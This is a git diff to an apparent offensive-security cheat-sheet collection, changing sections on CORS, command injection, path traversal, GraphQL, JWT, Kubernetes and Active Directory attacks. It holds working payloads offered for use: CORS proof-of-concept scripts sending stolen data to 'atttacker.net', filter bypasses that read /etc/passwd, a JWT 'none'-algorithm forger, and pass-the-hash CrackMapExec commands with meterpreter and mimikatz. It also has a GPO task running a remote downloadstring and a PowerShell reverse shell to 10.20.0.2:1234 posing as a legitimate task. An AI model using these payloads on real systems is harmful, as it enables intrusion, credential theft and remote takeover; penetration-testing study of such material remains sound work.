diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index 8be1b6f..b3768b0 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -16,6 +16,7 @@ - [Twitter API Secret](#twitter-api-secret) - [Twitter Bearer Token](#twitter-bearer-token) - [Gitlab Personal Access Token](#gitlab-personal-access-token) + - [HockeyApp API Token](#hockeyapp-api-token) - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key) @@ -98,6 +99,13 @@ curl "https://gitlab.example.com/api/v4/projects?private_token= By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token @@ -125,4 +133,5 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) -* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) \ No newline at end of file +* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) +* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/) \ No newline at end of file diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index dcf5bfc..138fb1c 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -1,90 +1,185 @@ -# CORS Misconfiguration - -> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. - -## Summary - -* [Prerequisites](#prerequisites) -* [Exploitation](#exploitation) -* [References](#references) - -## Prerequisites - -* BURP HEADER> `Origin: https://evil.com` -* VICTIM HEADER> `Access-Control-Allow-Credential: true` -* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` - -## Exploitation - -Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. - -### Vulnerable example - -```powershell -GET /endpoint HTTP/1.1 -Host: victim.example.com -Origin: https://evil.com -Cookie: sessionid=... - -HTTP/1.1 200 OK -Access-Control-Allow-Origin: https://evil.com -Access-Control-Allow-Credentials: true - -{"[private API key]"} -``` - -### Proof of concept - -```js -var req = new XMLHttpRequest(); -req.onload = reqListener; -req.open('get','https://victim.example.com/endpoint',true); -req.withCredentials = true; -req.send(); - -function reqListener() { - location='//atttacker.net/log?key='+this.responseText; -}; -``` - -or - -```html - - -

CORS PoC

-
- -
- - - -``` - -## Bug Bounty reports - -* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) -* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) -* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) -* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) -* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) - -## References - -* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) -* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) -* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) \ No newline at end of file +# CORS Misconfiguration + +> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. + +## Summary + +* [Tools](#tools) +* [Prerequisites](#prerequisites) +* [Exploitation](#exploitation) +* [References](#references) + +## Tools + +* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/) + +## Prerequisites + +* BURP HEADER> `Origin: https://evil.com` +* VICTIM HEADER> `Access-Control-Allow-Credential: true` +* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` + +## Exploitation + +Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. + +### Vulnerable Example: Origin Reflection + +#### Vulnerable Implementation + +```powershell +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: https://evil.com +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://evil.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +#### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://victim.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +or + +```html + + +

CORS PoC

+
+ +
+ + + +``` + +### Vulnerable Example: Null Origin + +#### Vulnerable Implementation + +It's possible that the server does not reflect the complete `Origin` header but +that the `null` origin is allowed. This would look like this in the server's +response: + +``` +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: null +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: null +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +#### Proof of concept + +This can be exploited by putting the attack code into an iframe using the data +URI scheme. If the data URI scheme is used, the browser will use the `null` +origin in the request: + +```html + +``` + +### Vulnerable Example: XSS on Trusted Origin + +If the application does implement a strict whitelist of allowed origins, the +exploit codes from above do not work. But if you have an XSS on a trusted +origin, you can inject the exploit coded from above in order to exploit CORS +again. + +``` +https://trusted-origin.example.com/?xss= +``` + +### Vulnerable Example: Wildcard Origin `*` without Credentials + +If the server responds with a wildcard origin `*`, the browser does never send +the cookies. However, if the server does not require authentication, it's still +possible to access the data on the server. This can happen on internal servers +that are not accessible from the Internet. The attacker's website can then +pivot into the internal network and access the server's data withotu +authentication. + +#### Vulnerable Implementation + +```powershell +GET /endpoint HTTP/1.1 +Host: api.internal.example.com +Origin: https://evil.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: * + +{"[private API key]"} +``` + +#### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.internal.example.com/endpoint',true); +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +## Bug Bounty reports + +* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) +* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) +* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) +* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) +* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) + +## References + +* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) +* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) +* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) +* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) diff --git a/Command Injection/README.md b/Command Injection/README.md index 8370522..5421c54 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd ### Bypass characters filter via hex encoding -linux -``` +Linux + +```powershell swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" /etc/passwd @@ -136,14 +137,13 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764) swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)` root:x:0:0:root:/root:/bin/bash - ``` ### Bypass characters filter Commands execution without backslash and slash - linux bash -``` +```powershell swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1} / @@ -158,7 +158,6 @@ swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< . swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd root:x:0:0:root:/root:/bin/bash - ``` ### Bypass Blacklisted words diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index ec975de..3993305 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -123,6 +123,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software ### Interesting Windows files +Always existing file in recent Windows machine. +Ideal to test path traversal but nothing much interesting inside... + +```powershell +c:\windows\system32\license.rtf +c:\windows\system32\eula.txt +``` + Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) ```powershell @@ -167,5 +175,6 @@ The following log files are controllable and can be included with an evil payloa ## References +* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/) * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 964961a..178729e 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -289,6 +289,8 @@ Just append your PHP code into the log file by doing a request to the service (A ```powershell http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log +http://example.com/index.php?page=/var/log/apache2/access.log +http://example.com/index.php?page=/var/log/apache2/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 3a9883b..e602f85 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -22,8 +22,12 @@ ## Tools * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) +* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/) * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) +* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) +* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) +* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/) ## Exploit @@ -152,6 +156,34 @@ query IntrospectionQuery { } ``` +Single line query to dump the database schema without fragments. + +```js +__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}} +``` + +### List path + +```php +$ git clone https://gitlab.com/dee-see/graphql-path-enum +$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill +Found 27 ways to reach the "Skill" node from the "Query" node: +- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill +- Query (query) -> Query (skills) -> Skill +``` ### Extract data @@ -289,4 +321,4 @@ mutation finishChannelVerificationMutation( * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) * [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) * [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) -* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) \ No newline at end of file +* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index a082110..3dfa63d 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -161,5 +161,7 @@ phpggc monolog/rce1 'phpinfo();' -s * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) -* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web) +* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/meepwn-2017-write-ups/#TSULOTT-Web) * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) +* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) +* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index a6fb080..e186299 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -100,37 +100,25 @@ To exploit this vulnerability, you just need to decode the JWT and change the al However, this won't work unless you **remove** the signature -The following code is a basic test for a None algorithm. - -```python -import jwt -import base64 - -def b64urlencode(data): - return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '') - -print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \ - '.' + b64urlencode("{\"data\":\"test\"}") + '.' -``` - Alternatively you can modify an existing JWT (be careful with the expiration time) -```python -#!/usr/bin/python +```python3 +#!/usr/bin/python3 # -*- coding: utf-8 -*- -jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ" -header, payload, signature = jwt.split('.') +import jwt -# Replacing the ALGO and the payload username -header = header.decode('base64').replace('HS256',"none") -payload = (payload+"==").decode('base64').replace('test','admin') +jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ' -header = header.encode('base64').strip().replace("=","") -payload = payload.encode('base64').strip().replace("=","") +decodedToken = jwt.decode(jwtToken, verify=False) # Need to decode the token before encoding with type 'None' +noneEncoded = jwt.encode(decodedToken, key='', algorithm=None) -# 'The algorithm 'none' is not supported' -print( header+"."+payload+".") +print(noneEncoded.decode()) + +""" +Output: +eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0. +""" ``` ## JWT Signature - RS256 to HS256 @@ -290,4 +278,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) -- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) +- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass) \ No newline at end of file diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index d409dc0..984d621 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -25,6 +25,16 @@ * [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios. +## Service Token + +> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod. + +```powershell +$ cat /var/run/secrets/kubernetes.io/serviceaccount + +# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting +``` + ## RBAC Configuration ### Listing Secrets @@ -188,4 +198,5 @@ http://:10255/pods ## References - [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1) -- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) \ No newline at end of file +- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 395c02f..ad4ff3c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -46,6 +46,9 @@ - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) + - [GenericAll](#genericall) + - [GenericWrite](#genericwrite) + - [WriteDACL](#writedacl) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) @@ -71,38 +74,50 @@ * [BloodHound](https://github.com/BloodHoundAD/BloodHound) ```powershell - apt install bloodhound #kali - neo4j console + # start BloodHound and the database + root@payload$ apt install bloodhound #kali + root@payload$ neo4j console + root@payload$ ./bloodhound Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j - ./bloodhound - SharpHound.exe (from resources/Ingestor) - SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb -SearchForest - SharpHound.exe --EncryptZip --ZipFilename export.zip - or + + # run the ingestor on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/SharpHound3 + .\SharpHound.exe (from resources/Ingestor) + .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb -SearchForest + .\SharpHound.exe --EncryptZip --ZipFilename export.zip + .\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder + + # or run the ingestor on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public - or + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory + + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all ``` * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - ```bash - apt-get install -y libssl-dev libffi-dev python-dev build-essential - git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - crackmapexec smb -L - crackmapexec smb -M name_module -o VAR=DATA - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares - crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' - crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz - crackmapexec mimikatz --server http --server-port 80 + ```powershell + # use the latest release, CME is now a binary packaged will all its dependencies + root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip + + # execute cme (smb, winrm, mssql, ...) + root@payload$ cme smb -L + root@payload$ cme smb -M name_module -o VAR=DATA + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares + root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' + root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz + root@payload$ cme mimikatz --server http --server-port 80 ``` * [Mitm6](https://github.com/fox-it/mitm6.git) @@ -391,7 +406,14 @@ Get-NetGPOGroup ### Exploit Group Policy Objects GPO +> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner + ```powershell +# Build and configure SharpGPOAbuse +git clone https://github.com/FSecureLABS/SharpGPOAbuse +Install-Package CommandLineParser -Version 1.9.3.15 +ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll + # Adding User Rights SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" @@ -405,6 +427,32 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" ``` +Abuse GPO with **pyGPOAbuse** + +```powershell +git clone https://github.com/Hackndo/pyGPOAbuse +# Add john user to local administrators group (Password: H4x00r123..) +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" + +# Reverse shell example +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ + -powershell \ + -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ + -taskname "Completely Legit Task" \ + -description "Dis is legit, pliz no delete" \ + -user +``` + +Abuse GPO with **PowerView** + +```powershell +# Enumerate GPO +Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} + +# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO +New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc 